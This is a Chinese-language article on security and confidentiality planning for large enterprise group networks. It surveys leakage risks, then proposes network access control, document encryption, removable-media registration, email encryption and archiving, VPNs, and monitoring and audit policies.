经过对国内大型企业集团的了解和分析得知，国内大型企业集团的网络和信息化部有一些共性。大型企业集团一般拥有自己国内或国际的广域网，一般集团总部和各分部/分企业集团都有单独的互联网出口。集团和自已的上下游的合作伙伴会通过专线或互联网交换信息(见图1)。企业集团这种网络架构存在互联网出口多、安全性低，信息孤岛、OA等应用需要整合等典型问题。同时企业和合作伙伴的联网安伞也需要考虑。集团信息安全系统主要是由防火墙、入侵监测和病毒防范等组成，这种方法造成安全投入不断增加、维护与管理更加复杂、信息系统的使用效率大大降低、对内部没有防范，对新的攻击入侵毫无防御能力(如冲击波、振荡波)等一系列问舾。目前企业集团急需一套完整的符合国家信息安全保障工作要求的安全保密方案。

1.2大型企业集团信息网络的安全隐患

1.2.1互联网的安全使用问题

由于互联网使用的广泛性、接入手段的多样性(modem拨号、以太网卡、无线网卡、蓝牙、红外等等)、应用的复杂性以及攻击行为的隐蔽性(蠕虫，病毒、木马、僵尸等等)，近年来我国已发生多起严重的网上失、窃密案件。威胁互联网安全的因素包括“黑客”的入侵，计算机病毒，数据“窃听”和拦截等方面。

企业集团内同样存在因广泛使用互联网而可能发生的核心企业秘密外泄的严重风险。因此，必须采用有效的技术手段，加强监督管理，规范互联网的使用，以达到保护国家秘密和集团企业核心秘密的目的。

1.2.2终端安全问题

随着企业信息网的对外开放，终端数量的日渐庞大，使企业信息网正在承受来自互联网的各种信息安全威胁，如网络蠕虫、安全攻击，垃圾邮件等。企业网终端没有统一的管理，病毒库不能得到严格升级，每台终端上的操作系统安全漏洞补丁不能得到及时更新，这些威胁都会严再影响企业内部网络的安全使用，并进一步威胁企业的健康发展。

在现有网络架构下，只要接入集团的一台终端感染网络病毒，就可能导致往有数千台终端的网络内爆发蠕虫病毒，网络中会充斥大量的无用数据包，占用几乎全部的网络设备资源和带宽，导致真正的应用数据包无法被传输，甚至出现交换机由于CPU利用率过高而近似死机的现象。因此，必须对集团网络从交换机终端即网络边缘开始进行安全控制。

1.2.3 Web应用系统分级授权控制问题

企业集团一般授权系统比较单一，需要建立分级授权系统对应用系统进行保护，主要包括：(1)边界权限控制：各企业集团内部上页属于内部办公平台，必须受限访问。(2)重要模块控制：各企业集团内部主页有企业秘密信息模块，也有公开信息模块。企业秘密信息模块包括OA系统、竞争情报、工作报告、会议纪要、科技成果、管珲课题研究等内容。应加强对企业秘密信息模块的保密管理，依据工作分工、分级授权进行访问控制和管理。

1.2.4文件保护问题

由于企业集团内部网络监控的缺位，目前存在以下内部泄密途径：(1)内部人员将资料通过移动存储介质从电脑中拷出带走；(2)内部人员通过互联网将资料通过电子邮件发送给外部人员；(3)将文件打印后带出。(4)将办公用便携式电脑直接带回家中，(5)电脑易手后，硬盘上的资料没有处理；(6)随意将文件设成共享，导致非相关人员获取资料；(7)移动存储介质设备共用，导致非相关人员获取资料；(8)将私人便携式电脑带到企业集团，接入局域网，窃取资料；(9)开启同事电脑，浏览、复制同事电脑里的资料。此外，还有很多其他途径可以被别有用心的内部人员利用以窃取资料。

1.2.5移动存储介质和设备管理问题

越来越多的敏感信息、秘密数据和档案资料被存贮在移动存储介质里，给企业信息资源管理带来相当人的安全隐患。企业集团移动存储介质使用管理中存在的问题主要包括：非法拷贝敏感信息和涉密信息到移动存储介质中；企业外部移动仔储介质未经授权在内部使用；企业内部移动存储介质及信息资源被带出，在外部非授权使用；存贮征媒体中的秘密信息在联网或人工交换时被泄露或被窃取；处理废旧移动存储介质时，末做信息清理；存有秘密信息的介质不经处理或任无人监督的情况下被带出修理；存有秘密信息的存储介质失窃；秘密信息和非秘密信息放在同一介质上。另外公私混用，存在一定安全隐患。

1.2.6涉密文件的等级保护问题

如果将涉密文件以明文方式存储在涉密存储介质中，一旦涉密存储介质(硬盘、移动硬盘、U盘、笔记本电脑)意外遗失或者被盗，或者存储在上面的涉密信息被恶意通过网络发送出去，则可能造成涉密信息的泄漏。必须采用一定的技术于段，根据涉密文件的级别，以不同等级自动进行加密，使涉密存储介质中存储的文件为密文，即便涉密存储介质被盗或意外遗失，或者被恶意外泄，也不至于造成直接泄密的重大损失。

1.2.7邮件加密及归档审计

企业集团一般用户自主邮件恢复功能只能恢复30天之内的数据。且有一定的限制，无法查询和监督更长时期内的历史邮件。

据调查显示，目前全球范围内正式实行邮件归档系统的企业并不多，在我国企业中真正实施邮件归档的企业更是少之又少。与国外企业对邮件归档的认识不同的是，对于国内的企业负责人来说，也许他们更关心的是企业中的机密文件是否会被不轨员工利用电子邮件外泄。因此，必须采用一定的技术手段，实现邮件加密传输以及对邮件进行归档审计。利用邮件系统归档功能，可以根据企业集团工作需要查询和监督用户利用企业集团的邮件平台收发的电子邮件，尤其是公务邮件，对知识产权的保护具钉现实意义。

1.2.8 网络涉密传输

对于涉及氽业集团或国家秘密的数据传输，传输通道必须加密，以保证特殊条件下信息不被轻易窃取。

2、网络与信息安全保密建设总体方案

2.1总体目标

大型企业集团网络与信息安伞保密工作的总体目标可以定义为：针对集团网络及信息安全保密需要，构建系统的安全保密技术和防护策略及其措施，通过制度管理和技术防范，双管齐下，规范员工行为，以达到网络和信息资产安全的总体目标。最终达到“外人进不来，进来之后看不到，看到了拿不走，拿走了用不了，操作了可追溯”的效果。

2.2总体要求

对于网络与信息保密工作而言，管理方法和技术手段同等重要，缺一不可。只重视管理流程，缺乏足够的技术手段，信息安全保密工作就只能取决于执行者自身的政治觉悟。对于觉悟不高者而言，容易流于形式，只审视技术手段。不加强管理，信息安伞保密工作就容易受到轻视，技术手段反而成为绊脚石，安全保密工作无法有效开展。安全，特别是信息安全是一个系统工程，在这个系统工程中，体现着“三分技术，七分管理”。

2.3管理改进

大型企业集团应建立网络与信息安全保密组织，制定相关的管理制度，大力宣传信息保密工作的重要性。最大程度地保护企业的各种秘密信息。具体工作任务包括：(1)根据企业集团信息保密工作的具体要求建立适合本企业集团或部门的电子信息保密规定，建立可操作的工作制度。(2)对本企业集团有涉密信息的部门划分级别，对用户的电脑进行严格的安全配置，例如禁止使用USB盘、只能登录特定的电脯等；(3)用户不明确信息是否涉密时，由保密工作部门进行甄别；(4)为信息技术管理部门提供有关信息保密管理、技术改进、提升与完善的具体建议；(5)对本企业的员工进行信息保密培训与教育；(6)对涉密信息的交流与传递进行监督；(7)协助安全部门对违反保密规定的信息泄漏事件进行调查、取证。(8)与审计部门配合，定期或不定期对本企业集团的信息保密工作进行审计；(9)定期或不定期向企业高层与集团信息保密工作组报告本企业集团的信息保密工作情况。

2.4总体方案

2.4.1建立网络分区分级管理

目前，企业集团的整个信息网络是一个整体，没有内、外网之分以及保密专网，网络结构存在安全隐患。

为了提高信息安全性，根据信息的密级，结合工作的需要，对信息网络进行分区分级管理。从长远看，企业集团网络应该分为困密网、专用网、外网、办公内网四个安全区，如图2所示。对于安全区内的系统根据审要性进行分级管理。

2.4.2建立网络安全准入系统

在企业集团范围内建立终端安全防护和全面的网络准入控制系统，实现如下目标：

(1)网络准入控制。工作站必须符合定义的安全策略(例如安装了指定的防病毒软件、更新了病毒特征代码、安装了最新的微软补丁等)才能够接入网络，实现自动修复以及用户和设备的认证，保证网络上所有终端都是健康的。

(2)应用程序控制。只有指定版本的软件才能够访问网络资源，禁止用户私自安装的软件或木马程序、蠕虫访问网络。

(3)基于用户/组的访问控制策略。可以对不同的成员企业集团、部门、承包商、项目组、第三方接人人员采用不同的网络访问控制策略，构建集中管理的分布式防火墙体系。

2.4.3实施Web应用分级授权控制系统

随着企业集团业务的发腰和集团各部门之间信息交流的增多，因估息系统建没周期较长、系统众多，技术架构趋于复杂，需要一套灵活的、易于管理的Web应用授权控制系统。

新的Web授权系统作为企业集团内部Web应用统一的授权服务平台，为企业门户任应用层面提供信息浏览的安伞保障，满足企业在业务需求不断发展的过程中产生的信息安全方面的需要。同时，该系统也可以作为一项独立的安全服务，为以后的集团门户系统提供强有力的支撑。

2.4.4建立企业电子文件保护平台

建立企业集团范围的电子文件保护平台，解决如下问题：

(1)按需对涉密电子文件进行加密。

(2)单一或组合授予用户阅读，打印、复制、编辑等权限。

(3)对于脱离受控环境的电子文件，可以限制其只能在特定的计算机上使用；或设置其可读取的次数和有效期限。

(4)与各类信息系统进行集成。使得这些信息系统具备电子文件保护能力，并且不会改变系统的原有流程。

(5)无论使用U盘、移动硬盘、还是通过Email发附件的方式，在受控环境之外不能有效使用经保护的涉密电子文件。

(6)关注电子文件本身，而不是层出不穷的各类电子设备和文件载体。

2.4.5移动存储设备的使用管理

移动存储设备应分密级使用，并必须保证密级文件的安全。

移动存储设备应根据所保存的涉密内容。分级别进行登记和管理；采取技术手段，禁止未经许可的U盘在涉密计算机上进行使用，保证经过许可的U盘在涉密计算机上能正常使用，保证存储涉密文件的U盘丢失后不造成内容泄密。

2.4.6涉密文件安全等级保护

(1)所有文件只能任内部才能使用。即使被恶意通过互联网发出去，或者通过U盘拷贝出去，文件不能被正常读取。

(2)对文件征内部的流转进行等级划分。密级文件只能在具备相应或更高密级的计算机上才能被读取。

(3)文件以密文的方式在内部流转，即使在流转过程中被窃取，也不会造成重大泄密。

(4)对加密文件进行解密时，必须得到明确的授权。

(5)文件的整个流转过程具备完整的审计日志。

2.4.7实现邮件加密及归档审计

建立公开密钥基础设施(PKI)证书系统，要求部门经理以上用户采用PKI/CA(CA证书)邮件加密与数字签名的方式增加邮件系统访问的安全性。建立归档机制，自动、实时地对现有邮件系统中的邮件进行分类存储。终端用户删除邮件不会造成系统中数据的丢失。管理员可以根据需要随时根据各种条件进行检索。

2.4.8网络涉密传输

采用内置国家密码管理局认证硬件加密卡的网络加密机(VPN)进行数据传输通道的加密。即采用密码技术在公用网络中开辟出专用的隧道，形成专用网络，主要用于解决公共网络中数据传输的安全问题，保证内部网中的重要数据能够安全地借助公共网络进行交换。

3、网络与信息安全保密技术基本实施策略

根据大型企业集团网络与信息安伞保密总体方案，从六个方面加强安全保密技术措施，构建系统的安全保密防范体系。主要内容包括：网络安全准入、移动介质注册管理、电子文件加密保护、内部网页授权管理、国际互联网应用管控、操作日志和邮件归档审计等。

3.1网络安全准入

策略内容：对终端电脑实行注册管理，接入企业集团网络时需进行设备和账号双重认证控制。首先，通过系统后台验证终端电脑是否已在企业集团注册，是否符合安全标准(安装准入客户端和指定病毒防火墙)，验证合格后方允许接入系统；其次，用户输入账号、密码，经身份验证后方可访问内部信息资源。非注册终端设备或非授权账号不能接入内部办公网络，非安全终端设备(染毒)访问内部办公网络资源时受限。

解决问题：网络入口控制。防范非法接入网络；降低网络被病毒感染和攻击的概率。

3.2移动介质注册管理

策略内容：对移动存储介质(U盘、移动硬盘等)的使用进行注册管理。已注册移动存储介质在企业集团内网、工作电脑上可正常使用和交换数据；在外网或外部设备中，只有将移动存储介质设置为商旅模式并输入密码后方可使用；非注册移动仔储介质中的电子数据可拷贝至企业集团内网、工作电脑上，企业集团内网、工作电脑上的电子数据不能拷贝到非注册移动存储介质上；因工作需要向企业集团以外的电脑中拷贝电子数据时，经保密审查后，统一由企业集团或部门机要员将移动存储介质设置为商旅模式并进行解密；对注册移动存储介质中资料的所有更改、转移、交换、解密等行为，进行后台记录，作为审计依据。

解决问题：防范电子文件通过移动介质拷贝泄密，防范移动介质遗失造成失、泄密。

3.3 Web网页授权管理

策略内容：对企业集团内部主页进行三级授权管理。第一级为整个丰页的访问授权；第二级为主页内栏目或业务系统的访问授权，第三级为应用程序授权。各级授权管理分别由网页、栏目、业务系统的用户应用管理员负责。

解决问题：按授权范围查阅、利用网络信息资源，在安全范围内进行成果交流。

3.4电子文件加密保护

策略内容：禁止在企业集团网络上存储、处理、传输涉及国家秘密的电子文件、信息，对涉及企业秘密的电子文件、信息进行加密保护。丰委包括以下三个方面：

(1)对网页中需要保护的附件电子文件进行加密，根据需要对附件的查阅、修订、复制、下载、打印等权限进行控制。

(2)对部门或个人的最终成果类电子文件提供网络存储、备份管理审问，提供基于加密和授权保护的共享利用手段，进行成果管理和共享。设置个人文件夹备份保管个人成果文件，设置部门成果文件夹存储保管部门成果文件，设置部门共享文件夹任加密授权保护的前提下对成果文件进行共享。

(3)使用加密技术对重要或涉及企业秘密的电子文件进行加密管理，设置查阅、修订、复制、下载、打印等权限，按授权利用文件成果。

解决问题：进行成果管理，提供基于加密和授权保护的共享。防范非授权或无关人员接触涉密或敏感电于文件；防范二次传输泄密(授权人二次传送给无关人员或集团以外人员造成泄密)；防范移动电脑遗失造成的数据丢失或泄密。

3.5国际互联网应用管控

策略内容：实施互联网出口认证和流量管理系统，加强互联网系统监控和管理。禁止进行联机游戏、基金炒股、P2P下载、BBS交流以及QQ、MSN等即时通讯网络操作；禁止使用超文本传输协议(http)以外的应用；禁止一个账号在多台机器上同时登录互联网；按国家相关规定对访问互联网的行为进行后台监控，必要时对后台监控日志进行审计；禁止访问非工作相关网站或不良信息网站。对违反互联网使用管理规定的用户，收回其权限并在企业集团内部通告。

解决问题：依法安全使用互联网，提高网络安全性。监督防范擅自向外网(如BBS、博客等)张贴涉密文件资料而造成泄密。

3.6电子邮件管理

策略内容：与集团外部进行工作邮件往来时必须使用企业集团外部邮件系统，禁止使用邮件系统传送国家秘密文件信息；使用邮件系统传送企业秘密文件信息时，应使用电于文件保护系统或企业集团配发的USB Key CA证书对邮件进行加密；企业集团对员工的邮件收发行为进行监控、记录并归档，作为审计依据。

解决问题：防范通过非企业集团邮箱发送工作邮件可能造成的泄密，提供监控和追溯审查手段，加强邮件安全保密管理。

3.7监控审计

策略内容：完整记录用户访问互联网、收发邮件、电子文件拷贝、电脑操作以及信息系统管理员操作等所有信息传递活动日志，可对重点部门、部位或个人的电脑操作进行监控；根据需要对各种信息进行监控审计。审计工作由审计郜人员组织执行。

解决问题：提供监控审计手段，便于稽核追踪管理。区分管理权(用户)、操作杈(管理员)、审计权(审计人员)。

4、结束语

大型企业集团实施上述网络与信息安全保密技术和管理策略将取得明显的效果。比如，限制非法或不安全登录网络，提高了计算机信息系统的安全性；对计算机及移动存储介质进行注册管理，对涉密电子文件采取加密措施，实现了对电子文件的有效保密管控；安装应用国际互联网监控管理系统，确保安全、合法、规范地使用互联网，加强了信息保密管理；制定计算机网络与信息安全保密管理规定，提高了规范化管理水平；此外，通过该项日的建设与实施，深入推动了保密宣传教育工作，提高了员工的保密意识，对深入开展网路与信息安全保密工作具有重要的现实意义。